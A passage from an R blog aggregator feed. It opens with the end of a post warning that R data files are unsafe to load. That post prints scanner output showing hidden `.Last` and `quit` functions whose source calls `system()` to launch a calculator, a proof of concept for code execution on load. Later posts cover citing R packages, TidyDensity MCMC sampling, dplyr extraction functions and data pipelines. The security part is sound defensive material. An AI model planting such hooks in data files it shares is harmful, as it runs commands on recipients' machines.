.Last : function (...)  
 - attr(*, "srcref")= 'srcref' int [1:8] 1 13 6 1 13 1 1 6
  ..- attr(*, "srcfile")=Classes 'srcfilecopy', 'srcfile'  
quit : function (...)  
 - attr(*, "srcref")= 'srcref' int [1:8] 1 13 6 1 13 1 1 6
  ..- attr(*, "srcfile")=Classes 'srcfilecopy', 'srcfile'  

------------------------------------
Functions found: enumerating sources
------------------------------------

Checking `.Last`…

!! `.Last` may execute arbitrary code on your system under certain conditions !!

`.Last` source:
{
    cmd = if (.Platform$OS.type == "windows") 
        "calc.exe"
    else if (grepl("^darwin", version$os)) 
        "open -a Calculator.app"
    else "echo pwned\\!"
    system(cmd)
}


Checking `quit`…

!! `quit` may execute arbitrary code on your system under certain conditions !!

`quit` source:
{
    cmd = if (.Platform$OS.type == "windows") 
        "calc.exe"
    else if (grepl("^darwin", version$os)) 
        "open -a Calculator.app"
    else "echo pwned\\!"
    system(cmd)
}

There’s info in the repo on how to use that with Docker.

FIN

The big takeaway is (again) to not trust R data files you did not create or know the full provenance of. If you have an internet-facing Shiny app or Plumber API that takes R data files as input, get it off the internet and figure out some other way to take in the input.

While I fully disagree with the assignment of the CVE, I’m at least glad this situation brought attention to this very dangerous aspect of handling this type of file format in R.

The post CVE-2024-27322 Should Never Have Been Assigned And R Data Files Are Still Super Risky Even In R 4.4.0 appeared first on rud.is.

To leave a comment for the author, please follow the link and comment on their blog: R Archives - rud.is.

Notes on Citing R and R Packages

Higher Order Functions — Fri, 03 May 2024 05:00:00 +0000

[This article was first published on Higher Order Functions, and kindly contributed to R-bloggers]. (You can report issue about the content on this page here)

Our group has started using a new knowledge base system, so I have been writing up and revisiting some of my documentation. Here I am going to share a guide I wrote about citing R packages in academic writing.

Which software to cite

Let’s make a distinction here between reporting (or summarizing) an analysis and reproducing (or carrying out) an analysis.

Our main manuscript document is for reporting. We want to report which tools and which versions of those tools we used to get our statistical results. We don’t need to include every computational detail. We will save that level of detail for a supplemental document that shows the exact modeling code and sessioninfo::session_info() for reproducing our results. Moreover, journals will sometimes limit the number of references in a manuscript and a full R analysis might draw on 15 packages, so we in general cannot cite everything that helped us get our results. So, we can think more generally about citation priorities.

For an analysis carried out in R, we need to cite and version:

R (the programming language / analysis environment).
Third party packages that carried out the analyses.
- For example, nlme, lme4, ordinal, rms, brms.
If a package calls on another language or analysis tool, cite that tool as well.
- For example, brms and rstanarm fit models using the Stan programming language, so we need to cite and version Stan as well.
Packages that performed additional computation on analysis results.
- For example, emmeans to get marginal means from a fitted model.
Packages that visualized analysis results automatically.
- For example, see or interactions.

The following items would have the lowest priority for citations:

RStudio: It’s just an interface to the language. (Ideally, an analysis could be run without touching RStudio.)
The built-in stats package.
knitr/quarto/rmarkdown: These performed R computations for us and stored the results in a document.
Siloed off parts of a main package.
- For example, the gamlss package fits GAMLSS models but the distributions for model families are stored in the package gamlss.dist. gamlss needs gamlss.dist to work, but gamlss is the main important thing to cite.
Data storage formats.

If space and the publication venue permit, we can also cite and version the key R packages that manipulated or visualized the data such as tidyverse, ggplot2, broom, tidybayes/ggdist, etc. Be generous. We do want to credit the tools we used to get our results after all!

Where to get citation information

Creators of scientific software will often tell users how to cite their software. Scientific software tools often have an associated article that announces the software and describes how to use it, so authors will ask users to cite that publication so they can obtain academic credit for their software work.

For R and R packages, the citation() function will tell users how to cite their software. lme4 is one of those packages that directs users to a publication.

citation("lme4")
#> To cite lme4 in publications use:
#> 
#>   Douglas Bates, Martin Maechler, Ben Bolker, Steve Walker (2015).
#>   Fitting Linear Mixed-Effects Models Using lme4. Journal of
#>   Statistical Software, 67(1), 1-48. doi:10.18637/jss.v067.i01.
#> 
#> A BibTeX entry for LaTeX users is
#> 
#>   @Article{,
#>     title = {Fitting Linear Mixed-Effects Models Using {lme4}},
#>     author = {Douglas Bates and Martin M{\"a}chler and Ben Bolker and Steve Walker},
#>     journal = {Journal of Statistical Software},
#>     year = {2015},
#>     volume = {67},
#>     number = {1},
#>     pages = {1--48},
#>     doi = {10.18637/jss.v067.i01},
#>   }

Notice in the BibTeX entry at the bottom how {lme4} is put in braces. These braces tell LaTeX not to change the capitalization of that word when printing the title. Some journals or formats have different preferences for how to capitalize titles, but as a general rule of thumb, software titles need to be printed verbatim, or as they would be used by the user. (library(Lme4) will not load the lme4 package). When creating bibliography entries, take care to follow the capitalization so that the software name is accurate. Take care also to differentiate between statistical methods and software names: “We fit GAMLSS models with the gamlss package”.

For CRAN packages, the output of citation() is also provided online in HTML. The CRAN package description page (e.g., lme4) includes a Citation entry which generates a formatted version of the citation information (e.g., lme4 citation info).

When the software doesn’t have a publication, R will generate a citation for you. The ordinal package is one such example.

citation("ordinal")
#> To cite 'ordinal' in publications use:
#> 
#>   Christensen R (2023). _ordinal-Regression Models for Ordinal Data_. R
#>   package version 2023.12-4,
#>   <https://CRAN.R-project.org/package=ordinal>.
#> 
#> A BibTeX entry for LaTeX users is
#> 
#>   @Manual{,
#>     title = {ordinal---Regression Models for Ordinal Data},
#>     author = {Rune H. B. Christensen},
#>     year = {2023},
#>     note = {R package version 2023.12-4},
#>     url = {https://CRAN.R-project.org/package=ordinal},
#>   }

The underscores _ in the title indicate that the title would be italicized when the citation is viewed on CRAN.
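If you keep a .bib file, one possible way to capture these entries is base R's toBibtex(). The sketch below uses the citation for R itself so that it runs without extra packages; the file name software.bib and the temp location are assumptions for illustration.

```r
# Citation for R itself; citation("lme4") works the same way if installed.
r_cite <- citation()

# Convert the citation object to BibTeX lines.
bib <- toBibtex(r_cite)

# Write the entry to a .bib file (a temp directory here, for illustration).
bib_path <- file.path(tempdir(), "software.bib")
writeLines(bib, bib_path)

bib
```

The generated entries have an empty citation key (`@Manual{,`), so you would still need to add a key by hand before citing them.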

How to cite and version R and R packages

As a rule of thumb, any citation of any resource should answer these questions:

Who (authors)
What (title and sometimes format)
When (year)
Where (journal, URL, book, DOI)

Then for software, we can add the following:

Which (version)

The citation() function will answer these questions for you.

There are a couple of other functions to know when it comes to package versions. utils::packageVersion() returns the package version as a package_version object, which prints like a string:

utils::packageVersion("lme4")
#> [1] '1.1.35.3'
utils::packageVersion("ordinal")
#> [1] '2023.12.4'
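Because the result is a version object rather than plain text, it can be converted or compared directly. A short sketch using the built-in stats package so that it runs anywhere (the threshold "3.5.0" is arbitrary):

```r
v <- utils::packageVersion("stats")

class(v)         # a version object, not a character vector
as.character(v)  # plain string, e.g. for pasting into a sentence

# Version-aware comparison: components are compared numerically,
# so "4.10.0" would sort after "4.9.0".
v >= "3.5.0"
```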

For the current R version, a bunch of built-in functions can tell you everything you need to know. I can never remember which of these functions I want (it’s getRversion()), so I will sometimes use utils::packageVersion("base") to get a simple version number.

R.version.string
#> [1] "R version 4.3.3 (2024-02-29 ucrt)"
R.version
#>                _                                
#> platform       x86_64-w64-mingw32               
#> arch           x86_64                           
#> os             mingw32                          
#> crt            ucrt                             
#> system         x86_64, mingw32                  
#> status                                          
#> major          4                                
#> minor          3.3                              
#> year           2024                             
#> month          02                               
#> day            29                               
#> svn rev        86002                            
#> language       R                                
#> version.string R version 4.3.3 (2024-02-29 ucrt)
#> nickname       Angel Food Cake
getRversion()
#> [1] '4.3.3'

utils::packageVersion("base")
#> [1] '4.3.3'

For Stan, depending on the backend used, the software version is available via:

# rstanarm and default brms
rstan::stan_version()
#> [1] "2.32.2"

# non-default for brms
cmdstanr::cmdstan_version()
#> [1] "2.34.1"

Examples

A simple example of R, a modeling R package and a helper R package:

Analyses were carried out in the R programming language (vers. 4.2.0, R Core Team, 2021). Mixed models were estimated using the lme4 package (vers. 1.1.28, Bates et al., 2015). We estimated marginal means and contrasts using the emmeans package (vers. 1.7.2, Lenth, 2021).

Below is the actual RMarkdown content, so that version numbers and citations are inlined automatically. (We’re omitting details on creating .bib files or using pandoc’s @ citations.)

```{r}
v_lme4 <- packageVersion("lme4")
v_r <- packageVersion("base")
v_emmeans <- packageVersion("emmeans")
```

Analyses were carried out in the R programming language [vers. `r v_r`,
@rstats]. Mixed models were estimated using the lme4 package
[vers. `r v_lme4`, @lme4]. We estimated marginal means and contrasts
using the emmeans package [vers. `r v_emmeans`, @emmeans].

Here is a more involved example involving an additional language and an R package that interfaces to that language:

We estimated the models using Stan (vers. 2.27.0, Carpenter et al., 2017) via the brms package (vers. 2.16.1, Bürkner, 2017) and tidybayes package (vers. 3.0.4, Kay, 2021) in R (vers. 4.3.0, R Core Team, 2021).

Behind the scenes, I had written the following RMarkdown:

```{r}
model <- targets::tar_read(model_random_slope)
v_stan <- model$version$cmdstan
v_brms <- model$version$brms
v_tidybayes <- packageVersion("tidybayes")
v_r <- getRversion()
```

We estimated the models using Stan [vers. `r v_stan`, @stan] via the
brms package [vers. `r v_brms`, @brms-jss] and tidybayes package
[vers. `r v_tidybayes`, @R-tidybayes] in R [vers. `r v_r`, @r-base].

Notice that I am reading in a cached model object (targets::tar_read()) and reading the software versions from that object. This arrangement avoids problems where models are fitted with one version of a package but utils::packageVersion() returns a different, more recent package version. brms stored these versions automatically for me. In general, when I cache a model like this, I store the package version in the model object.
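For models that do not record versions on their own, a minimal sketch of the same idea with a plain lm() fit follows. The element name software_versions and the .rds cache are assumptions for illustration, not something brms or targets does for you.

```r
# Fit a model and record the versions in use at fitting time.
fit <- lm(mpg ~ wt, data = mtcars)
fit$software_versions <- list(
  R     = getRversion(),
  stats = utils::packageVersion("stats")
)

# Cache the model; the versions travel with it.
cache_path <- tempfile(fileext = ".rds")
saveRDS(fit, cache_path)

# Later, possibly after packages were upgraded: report the stored versions,
# not whatever packageVersion() returns today.
cached  <- readRDS(cache_path)
v_stats <- cached$software_versions$stats
v_r     <- cached$software_versions$R
as.character(v_stats)
```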

Last knitted on 2024-05-03. Source code on GitHub.¹

.session_info
#> ─ Session info ───────────────────────────────────────────────────────────────
#>  setting         value
#>  version         R version 4.3.3 (2024-02-29 ucrt)
#>  os              Windows 11 x64 (build 22631)
#>  system          x86_64, mingw32
#>  ui              RTerm
#>  language        (EN)
#>  collate         English_United States.utf8
#>  ctype           English_United States.utf8
#>  tz              America/Chicago
#>  date            2024-05-03
#>  pandoc          NA
#>  stan (rstan)    2.32.2
#>  stan (cmdstanr) 2.34.1
#> 
#> ─ Packages ───────────────────────────────────────────────────────────────────
#>  ! package        * version  date (UTC) lib source
#>    abind            1.4-5    2016-07-21 [1] CRAN (R 4.3.0)
#>    backports        1.4.1    2021-12-13 [1] CRAN (R 4.3.0)
#>    cachem           1.0.8    2023-05-01 [1] CRAN (R 4.3.0)
#>    checkmate        2.3.1    2023-12-04 [1] CRAN (R 4.3.3)
#>    cli              3.6.2    2023-12-11 [1] CRAN (R 4.3.3)
#>    cmdstanr         0.7.1    2024-03-29 [1] local
#>    codetools        0.2-19   2023-02-01 [2] CRAN (R 4.3.3)
#>    colorspace       2.1-0    2023-01-23 [1] CRAN (R 4.3.0)
#>    curl             5.2.1    2024-03-01 [1] CRAN (R 4.3.3)
#>    distributional   0.4.0    2024-02-07 [1] CRAN (R 4.3.3)
#>    downlit          0.4.3    2023-06-29 [1] CRAN (R 4.3.2)
#>    dplyr          * 1.1.4    2023-11-17 [1] CRAN (R 4.3.2)
#>    evaluate         0.23     2023-11-01 [1] CRAN (R 4.3.2)
#>    fansi            1.0.6    2023-12-08 [1] CRAN (R 4.3.3)
#>    fastmap          1.1.1    2023-02-24 [1] CRAN (R 4.3.0)
#>    forcats        * 1.0.0    2023-01-29 [1] CRAN (R 4.3.0)
#>    generics         0.1.3    2022-07-05 [1] CRAN (R 4.3.0)
#>    ggplot2        * 3.5.1    2024-04-23 [1] CRAN (R 4.3.3)
#>    git2r            0.33.0   2023-11-26 [1] CRAN (R 4.3.2)
#>    glue             1.7.0    2024-01-09 [1] CRAN (R 4.3.3)
#>    gridExtra        2.3      2017-09-09 [1] CRAN (R 4.3.0)
#>    gtable           0.3.5    2024-04-22 [1] CRAN (R 4.3.3)
#>    here             1.0.1    2020-12-13 [1] CRAN (R 4.3.0)
#>    hms              1.1.3    2023-03-21 [1] CRAN (R 4.3.0)
#>    inline           0.3.19   2021-05-31 [1] CRAN (R 4.3.0)
#>    jsonlite         1.8.8    2023-12-04 [1] CRAN (R 4.3.3)
#>    knitr          * 1.46     2024-04-06 [1] CRAN (R 4.3.3)
#>    lifecycle        1.0.4    2023-11-07 [1] CRAN (R 4.3.2)
#>    loo              2.7.0    2024-02-24 [1] CRAN (R 4.3.3)
#>    lubridate      * 1.9.3    2023-09-27 [1] CRAN (R 4.3.1)
#>    magrittr         2.0.3    2022-03-30 [1] CRAN (R 4.3.0)
#>    matrixStats      1.3.0    2024-04-11 [1] CRAN (R 4.3.3)
#>    memoise          2.0.1    2021-11-26 [1] CRAN (R 4.3.0)
#>    munsell          0.5.1    2024-04-01 [1] CRAN (R 4.3.3)
#>    pillar           1.9.0    2023-03-22 [1] CRAN (R 4.3.0)
#>    pkgbuild         1.4.4    2024-03-17 [1] CRAN (R 4.3.3)
#>    pkgconfig        2.0.3    2019-09-22 [1] CRAN (R 4.3.0)
#>    posterior        1.5.0    2023-10-31 [1] CRAN (R 4.3.2)
#>    processx         3.8.4    2024-03-16 [1] CRAN (R 4.3.3)
#>    ps               1.7.6    2024-01-18 [1] CRAN (R 4.3.3)
#>    purrr          * 1.0.2    2023-08-10 [1] CRAN (R 4.3.1)
#>    QuickJSR         1.1.3    2024-01-31 [1] CRAN (R 4.3.3)
#>    R6               2.5.1    2021-08-19 [1] CRAN (R 4.3.0)
#>    ragg             1.3.0    2024-03-13 [1] CRAN (R 4.3.3)
#>    Rcpp             1.0.12   2024-01-09 [1] CRAN (R 4.3.3)
#>  D RcppParallel     5.1.7    2023-02-27 [1] CRAN (R 4.3.0)
#>    readr          * 2.1.5    2024-01-10 [1] CRAN (R 4.3.3)
#>    rlang            1.1.3    2024-01-10 [1] CRAN (R 4.3.3)
#>    rprojroot        2.0.4    2023-11-05 [1] CRAN (R 4.3.2)
#>    rstan            2.32.6   2024-03-05 [1] CRAN (R 4.3.3)
#>    rstudioapi       0.16.0   2024-03-24 [1] CRAN (R 4.3.3)
#>    scales           1.3.0    2023-11-28 [1] CRAN (R 4.3.2)
#>    sessioninfo      1.2.2    2021-12-06 [1] CRAN (R 4.3.0)
#>    StanHeaders      2.32.6   2024-03-01 [1] CRAN (R 4.3.3)
#>    stringi          1.8.3    2023-12-11 [1] CRAN (R 4.3.2)
#>    stringr        * 1.5.1    2023-11-14 [1] CRAN (R 4.3.2)
#>    systemfonts      1.0.6    2024-03-07 [1] CRAN (R 4.3.3)
#>    tensorA          0.36.2.1 2023-12-13 [1] CRAN (R 4.3.2)
#>    textshaping      0.3.7    2023-10-09 [1] CRAN (R 4.3.1)
#>    tibble         * 3.2.1    2023-03-20 [1] CRAN (R 4.3.0)
#>    tidyr          * 1.3.1    2024-01-24 [1] CRAN (R 4.3.3)
#>    tidyselect       1.2.1    2024-03-11 [1] CRAN (R 4.3.3)
#>    tidyverse      * 2.0.0    2023-02-22 [1] CRAN (R 4.3.0)
#>    timechange       0.3.0    2024-01-18 [1] CRAN (R 4.3.3)
#>    tzdb             0.4.0    2023-05-12 [1] CRAN (R 4.3.0)
#>    utf8             1.2.4    2023-10-22 [1] CRAN (R 4.3.1)
#>    V8               4.4.2    2024-02-15 [1] CRAN (R 4.3.3)
#>    vctrs            0.6.5    2023-12-01 [1] CRAN (R 4.3.3)
#>    withr            3.0.0    2024-01-16 [1] CRAN (R 4.3.2)
#>    xfun             0.43     2024-03-25 [1] CRAN (R 4.3.3)
#>    yaml             2.3.8    2023-12-11 [1] CRAN (R 4.3.2)
#> 
#>  [1] C:/Users/Tristan/AppData/Local/R/win-library/4.3
#>  [2] C:/Program Files/R/R-4.3.3/library
#> 
#>  D ── DLL MD5 mismatch, broken installation.
#> 
#> ──────────────────────────────────────────────────────────────────────────────

To leave a comment for the author, please follow the link and comment on their blog: Higher Order Functions.

Exploring Data with TidyDensity’s tidy_mcmc_sampling()

Steven P. Sanderson II, MPH — Fri, 03 May 2024 04:00:00 +0000

[This article was first published on Steve's Data Tips and Tricks, and kindly contributed to R-bloggers]. (You can report issue about the content on this page here)

Introduction

In the area of statistical modeling and Bayesian inference, Markov Chain Monte Carlo (MCMC) methods are indispensable tools for tackling complex problems. The new tidy_mcmc_sampling() function in the TidyDensity R package simplifies MCMC sampling and visualization, making it accessible to a broader audience of data enthusiasts and analysts.

Understanding MCMC

Before we dive into the practical use of tidy_mcmc_sampling(), let’s briefly discuss why MCMC is valuable. MCMC methods are particularly useful when dealing with Bayesian statistics, where exact analytical solutions are challenging or impossible due to the complexity of the models involved.

MCMC allows us to draw samples from a probability distribution, especially in cases where direct sampling is impractical. This is achieved by constructing a Markov chain that converges to the desired distribution after a sufficient number of iterations. Once converged, these samples can provide insights into the posterior distribution of parameters, allowing us to make probabilistic inferences.
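To illustrate the general idea of a chain that converges to a target distribution, here is a minimal random-walk Metropolis sketch in base R. It is a textbook illustration under simple assumptions (a standard normal target, a deliberately poor starting value, a fixed burn-in), not a description of how TidyDensity works internally.

```r
set.seed(42)

# Log-density of the target distribution (standard normal in this sketch).
log_target <- function(x) dnorm(x, log = TRUE)

n_iter  <- 20000
burn_in <- 2000
chain   <- numeric(n_iter)
current <- 5  # start far from the bulk of the target on purpose

for (i in seq_len(n_iter)) {
  proposal  <- current + rnorm(1, sd = 1)  # symmetric random-walk proposal
  log_ratio <- log_target(proposal) - log_target(current)
  # Accept with probability min(1, target(proposal) / target(current)).
  if (log(runif(1)) < log_ratio) current <- proposal
  chain[i] <- current
}

# Discard the early draws taken before the chain settled down.
draws <- chain[(burn_in + 1):n_iter]
c(mean = mean(draws), sd = sd(draws))
```

After burn-in, the mean and standard deviation of the draws should land close to the target's 0 and 1.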

Introducing `tidy_mcmc_sampling()`

The tidy_mcmc_sampling() function in TidyDensity harnesses the power of MCMC sampling and presents the results in a tidy format, facilitating further analysis and visualization. Let’s explore its usage and capabilities.

Usage Example

Suppose we have a dataset data that we want to analyze using MCMC sampling:

library(TidyDensity)

# Generate MCMC samples
set.seed(123)
data <- rnorm(100)
result <- tidy_mcmc_sampling(data, .fns = "median", .cum_fns = "cmedian")
result

$mcmc_data
# A tibble: 4,000 × 3
   sim_number name                 value
                         
 1 1          .sample_median    -0.0285 
 2 1          .cum_stat_cmedian -0.0285 
 3 2          .sample_median     0.239  
 4 2          .cum_stat_cmedian  0.105  
 5 3          .sample_median     0.00576
 6 3          .cum_stat_cmedian  0.00576
 7 4          .sample_median    -0.0357 
 8 4          .cum_stat_cmedian -0.0114 
 9 5          .sample_median    -0.111  
10 5          .cum_stat_cmedian -0.0285 
# ℹ 3,990 more rows

$plt

In this example:

We generate 100 random normal values using rnorm(100).
The tidy_mcmc_sampling() function is then applied to this data, specifying that we want to compute the median ("median") of each MCMC sample and the cumulative median ("cmedian") across all samples. Because .num_sims is not set, the default of 2000 simulations is used.

Key Arguments

.x: The input data vector for MCMC sampling.
.fns: A character vector specifying the function(s) to apply to each MCMC sample. By default, it computes the mean ("mean"), but you can customize this to any function that makes sense for your analysis.
.cum_fns: A character vector specifying the function(s) to apply to the cumulative MCMC samples. The default is to compute the cumulative mean ("cmean"), but you can change this based on your requirements.
.num_sims: The number of MCMC simulations to run. More simulations generally lead to more accurate results but can be computationally expensive. The default is 2000.

Visualizing Results

The tidy_mcmc_sampling() function not only returns tidy data but also generates a plot to visualize the MCMC samples and cumulative statistics. This visualization is essential for understanding the distribution of samples and how they evolve over iterations.

Try It Yourself!

If you’re intrigued by the capabilities of MCMC and want to explore it in your data analysis workflow, I encourage you to try out tidy_mcmc_sampling() with your own datasets and custom functions. Experiment with different parameters and visualize the results to gain deeper insights into your data.

In conclusion, tidy_mcmc_sampling() extends the functionality of TidyDensity by offering a user-friendly interface for conducting MCMC sampling and analysis. Whether you’re new to Bayesian statistics or a seasoned practitioner, this function can streamline your workflow and enhance your understanding of complex datasets. Give it a spin and unlock new possibilities in your data exploration journey!

To leave a comment for the author, please follow the link and comment on their blog: Steve's Data Tips and Tricks.

Extract values from vector in R: dplyr

R Archives » Data Science Tutorials — Thu, 02 May 2024 13:20:03 +0000

[This article was first published on R Archives » Data Science Tutorials, and kindly contributed to R-bloggers]. (You can report issue about the content on this page here)

The post Extract values from vector in R: dplyr appeared first on Data Science Tutorials

In this article, we will look at extracting specific values from a vector using the nth, first, and last functions from the dplyr package in the R programming language.

The article is structured into four examples that demonstrate the extraction of vector elements.

Extract values from vector in R

To begin, install and load the dplyr package in R.

install.packages("dplyr")        
library("dplyr")

Our example vector, denoted as ‘x’, is a character vector containing nine letters.

We then proceed to apply the functions to our example vector.

x <- letters[1:9]               # Create example vector
x
# "a" "b" "c" "d" "e" "f" "g" "h" "i"

Example 1: nth Function

We explore the usage of the nth function, which allows us to extract a vector element from anywhere within the vector.

By applying the nth function and specifying the position of the desired element, we obtain the desired output.

nth(x, 5)   # Apply nth function
# "e"

Example 2: nth Function with Negative Value

Example 2 showcases the application of the nth function to extract an element from the end of the vector.

By placing a minus sign before the position, we can retrieve elements from the end of the vector.

nth(x, -3)  # Apply nth function with a negative position
# "g"

Example 3: first Function

Example 3 demonstrates the first function, which returns the first element of an input vector.

first(x)    # Apply first function
# "a"

This function works similarly to the nth function but is specifically designed to target the first element.

Example 4: last Function

Lastly, Example 4 illustrates the use of the last function, which returns the last element of a vector.

last(x)     # Apply last function
# "i"

This function complements the first function by focusing on the end of the vector.
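For comparison, the same four elements can be reached with plain base R indexing. This sketch is only meant to show what each dplyr helper is picking out; the variable names are made up for illustration.

```r
x <- letters[1:9]

fifth          <- x[5]              # same element as nth(x, 5)
third_from_end <- x[length(x) - 2]  # same element as nth(x, -3)
first_elem     <- x[1]              # same element as first(x)
last_elem      <- x[length(x)]      # same element as last(x)

c(fifth, third_from_end, first_elem, last_elem)
# "e" "g" "a" "i"
```

The dplyr versions read more clearly inside pipelines and grouped summaries, which is where they tend to be most useful.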

Conclusion

This article provides a comprehensive guide on how to use the nth, first, and last functions from the dplyr package in R to extract specific elements from a vector.

By understanding and applying these functions, users can effectively manipulate and analyze their data in the R programming environment.

To leave a comment for the author, please follow the link and comment on their blog: R Archives » Data Science Tutorials.

Ainulindalë in R: Orchestrating Data Pipelines for World Creation

Numbers around us — Thu, 02 May 2024 10:32:59 +0000

[This article was first published on Numbers around us - Medium, and kindly contributed to R-bloggers]. (You can report issue about the content on this page here)

In the great, unfolding narrative of J.R.R. Tolkien’s Ainulindalë, the world begins not with a bang, nor a word, but with a song. The Ainur, divine spirits, sing into the void at the behest of Ilúvatar, their voices weaving together to create a harmonious reality. Just as these divine voices layer upon each other to shape the physical and metaphysical landscapes of Middle-earth, data scientists and analysts use tools and techniques to orchestrate vast pools of data into coherent, actionable insights.

The realm of data science, particularly when wielded through the versatile capabilities of R, mirrors this act of creation. Just as each Ainu contributes a unique melody to the Great Music, each step in a data pipeline adds a layer of transformation, enriching the raw data until it culminates into a symphony of insights. The process of building data pipelines in R — collecting, cleaning, transforming, and storing data — is akin to conducting a grand orchestra, where every instrument must perform in perfect harmony to achieve the desired outcome.

This article is crafted for those who stand on the brink of their own creation myths. Whether you’re a seasoned data analyst looking to refine your craft or a burgeoning scientist just beginning to wield the tools of R, the following chapters will guide you through setting up robust data pipelines, ensuring that your data projects are as flawless and impactful as the world shaped by the Ainur.

As we delve into the mechanics of data pipelines, remember that each function and package in R is an instrument in your orchestra, and you are the conductor. Let’s begin by preparing our instruments — setting up the R environment with the right packages to ensure that every note rings true.

Preparing the Instruments: Setting Up Your R Environment

As we embark on the creation of our data pipelines, akin to the Ainur tuning their instruments before the grand composition, it is crucial to carefully select our tools and organize our workspace in R. This preparation will ensure that the data flows smoothly through the pipeline, from raw input to insightful output.

Choosing the Right Libraries

In the almost limitless repository of R packages, selecting the right ones is critical for efficient data handling and manipulation. Here are some indispensable libraries tailored for specific stages of the data pipeline:

Data Manipulation: dplyr offers a grammar of data manipulation, providing verbs that allow you to solve the most common data manipulation challenges elegantly.
Data Tidying: tidyr complements dplyr by providing a set of functions designed to transform irregular and complex data into a tidy format.
Data Importing and Exporting: readr for fast reading and writing of data files, readxl for Excel files, and DBI for database connections.
String Operations: stringr simplifies the process of manipulating strings.

Each package is selected based on its ability to handle specific tasks within the data pipeline efficiently, ensuring that each step is optimized for both performance and ease of use.
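
Before running a pipeline, it can help to confirm that these packages are actually available. The following is a minimal sketch in base R; the helper name find_missing_packages() is made up for this illustration, and the package vector simply repeats the libraries listed above.

```r
# Packages named in this section; adjust the vector to your own pipeline
pipeline_packages <- c("dplyr", "tidyr", "readr", "readxl", "DBI", "stringr")

# Return the packages from `pkgs` that are not yet installed
# (hypothetical helper, not part of any package)
find_missing_packages <- function(pkgs) {
  installed <- vapply(pkgs, requireNamespace, logical(1), quietly = TRUE)
  pkgs[!installed]
}

missing_packages <- find_missing_packages(pipeline_packages)

if (length(missing_packages) > 0) {
  message("Missing packages: ", paste(missing_packages, collapse = ", "))
  # Uncomment to install them from CRAN:
  # install.packages(missing_packages)
} else {
  message("All pipeline packages are installed.")
}
```

Keeping the install step commented out is a deliberate choice here: a script that silently installs software can surprise collaborators, so the sketch only reports what is missing.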

Organizing Your Workspace

A well-organized working directory is essential for maintaining an efficient workflow. Setting your working directory in R to a project-specific folder helps in managing scripts, data files, and output systematically:

setwd("/path/to/your/project/directory")

Beyond setting the working directory, structuring your project folders effectively is crucial:

Data Folder: Store raw data and processed data separately. This separation ensures that original data remains unmodified, serving as a reliable baseline.
Scripts Folder: Maintain your R scripts here. Organizing scripts by their purpose or order of execution can streamline your workflow and make it easier to navigate your project.
Output Folder: This should contain results from analyses, including tables, charts, and reports. Keeping outputs separate from data and scripts helps in version control and avoids clutter.

Project Management Practices

Using an RStudio project can further enhance your workflow. Projects in RStudio make it easier to manage multiple related R scripts and keep all related files together. They also restore your workspace exactly as you left it, which is invaluable when working on complex data analyses.

Here’s a sample structure for a well-organized data project:

Project_Name/
│
├── data/
│   ├── raw/
│   └── processed/
│
├── R/
│   ├── cleaning.R
│   ├── analysis.R
│   └── reporting.R
│
└── output/
    ├── figures/
    └── reports/
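
The layout above can also be created from R itself. This is a small sketch using only base R; the function name create_project_skeleton() is an assumption for illustration, and the demonstration writes into a temporary directory rather than a real project.

```r
# Create the project skeleton shown above under `root`
# (hypothetical helper; folder names follow the sample structure)
create_project_skeleton <- function(root) {
  folders <- file.path(root, c(
    "data/raw", "data/processed",
    "R",
    "output/figures", "output/reports"
  ))
  for (folder in folders) {
    dir.create(folder, recursive = TRUE, showWarnings = FALSE)
  }
  invisible(folders)
}

# Demonstration in a temporary directory so nothing in your project is touched
demo_root <- file.path(tempdir(), "Project_Name")
create_project_skeleton(demo_root)
list.dirs(demo_root, full.names = FALSE, recursive = TRUE)
```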

By selecting the right libraries and organizing your R workspace and project folders strategically, you lay a solid foundation for smooth and effective data pipeline operations. Just as the Ainur needed harmony and precision to create the world, a well-prepared data scientist needs a finely tuned environment to bring data to life.

Gathering the Voices: Collecting Data

In the creation myth of Ainulindalë, each Ainu’s voice contributes uniquely to the world’s harmony. Analogously, in data science, the initial collection of data sets the tone for all analyses. This chapter will guide you through utilizing R to gather data from various sources, ensuring you capture a wide range of ‘voices’ to enrich your projects.

Understanding Data Sources

Data can originate from numerous sources, each with unique characteristics and handling requirements:

Local Files: Data often resides in files like CSVs, Excel spreadsheets, or plain text documents.
Databases: These are structured collections of data, often stored in SQL databases like MySQL or PostgreSQL, or NoSQL databases such as MongoDB.
Web Sources: Many applications and services expose their data through web APIs, or data may be scraped directly from web pages.

Using R to Import Data

R provides robust tools tailored for importing data from these varied sources, ensuring you can integrate them seamlessly into your analysis:

For CSV and Excel Files:

readr is highly optimized for reading large CSV files quickly and efficiently.
readxl extracts data from Excel files without needing Microsoft Excel.

library(readr)
data_csv <- read_csv("path/to/your/data.csv")

library(readxl)
data_excel <- read_excel("path/to/your/data.xlsx")

For Databases:

DBI is a database interface for R, which can be paired with database-specific packages like RMySQL for MySQL databases.

library(DBI)
conn <- dbConnect(RMySQL::MySQL(), dbname = "database_name", host = "host")
data_db <- dbGetQuery(conn, "SELECT * FROM table_name")
dbDisconnect(conn)  # Close the connection once the data is in memory

For Web Data:

rvest is ideal for scraping data from HTML web pages.
httr simplifies HTTP operations and is perfect for interacting with APIs.

library(rvest)
web_data <- read_html("http://example.com") %>%
            html_nodes("table") %>%
            html_table()

library(httr)
response <- GET("http://api.example.com/data")
api_data <- content(response, type = "application/json")

Practical Tips for Efficient Data Collection

To maximize efficiency and accuracy in your data collection efforts, consider the following tips:

Check Source Reliability: Always verify the reliability and stability of your data sources.
Automate When Possible: For recurrent data needs, automate the collection process. Tools like cron jobs on Linux and Task Scheduler on Windows can be used to schedule R scripts to run automatically.
Data Storage: Properly manage the storage of collected data. Even if the data is temporary, organize it in a manner that supports efficient access and manipulation.
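
One way to act on the first tip is to validate a source as soon as it is read, so that a broken or changed file stops the pipeline early. The sketch below uses base R only; read_validated_csv() and the required_cols argument are hypothetical names chosen for this illustration, not functions from readr or any other package.

```r
# Read a CSV file and fail early if it does not look as expected.
# `required_cols` is a hypothetical schema chosen for this illustration.
read_validated_csv <- function(path, required_cols) {
  if (!file.exists(path)) {
    stop("Source file not found: ", path)
  }
  data <- read.csv(path, stringsAsFactors = FALSE)
  missing_cols <- setdiff(required_cols, names(data))
  if (length(missing_cols) > 0) {
    stop("Missing expected columns: ", paste(missing_cols, collapse = ", "))
  }
  if (nrow(data) == 0) {
    stop("Source file contains no rows: ", path)
  }
  data
}

# Demonstration with a small temporary file
demo_path <- tempfile(fileext = ".csv")
write.csv(data.frame(id = 1:3, value = c(2.5, 3.1, 4.8)),
          demo_path, row.names = FALSE)
demo_data <- read_validated_csv(demo_path, required_cols = c("id", "value"))
```

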